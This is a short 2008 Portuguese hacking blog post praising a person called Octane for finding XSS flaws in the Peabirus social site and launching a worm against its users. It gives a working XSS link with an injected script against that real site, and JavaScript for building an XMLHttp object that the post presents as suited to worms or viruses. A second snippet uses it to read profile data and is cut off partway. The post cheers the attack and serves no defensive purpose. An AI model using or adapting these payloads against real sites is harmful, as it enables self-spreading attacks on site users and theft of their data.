nov 4 2008

Site Peabirus cheio de falhas XSS

O grande amigo da garotada Octane detectou várias falhas de xss, e como ele é bem ligeiro já aproveitou de lançar um wormzinho para brincar com o pessoal do site ;D, e já estamos lançando de primeira mão, se o site ficar fora do ar, ou a notícia for reportada por grandes meios comunicativos. Boa Octane ;D

Dou só um exemplinho de um link com falha de XSS que encontrei:

http://www.peabirus.com.br/redes/form/buscaav?chaves=%3Cscript%3Ealert%28%27xss+infomaroto%27%29%3C%2Fscript%3E&tipo=publicacao&tipo2

O Octane divulgou um trecho para criar o objeto xmlHttp e que funciona na maioria dos browsers.

?View Code JAVASCRIPT
// criar o objeto XMLHttp, essa função cria o objeto na maioria dos browsers, é curta, e para worm, vírus ou sei lá o que vc quer, menos bytes é melhor
 
javascript:function ajaks(){return (window.ActiveXObject? new ActiveXObject('Msxml2.XMLHTTP'): new XMLHttpRequest)};void(0)
 
// usando ela, pegando o numero de scraps do profile.
 
javascript:function ajaks(){return (window.ActiveXObject? new ActiveXObject('Msxml2.XMLHTTP'): new XMLHttpRequest)}; with(new ajaks()){open("GET", "Home.aspx",false);send(0);alert(responseText.match(/m">(.*)

DEIXE UM COMENTÁRIO

Subscrever

Subscreve o Blog

Publicidade

Artigos Recentes

Artigos Populares

Categorias

Comentários Recentes

Links

Leitores Recentes

VALE O CLIQUE!

Site Seguro Colmeia: O melhor dos blogs Ocioso

Divulgue o blog Infomaroto em seu site e tenha seu link ou banner aqui.
Blog Infomaroto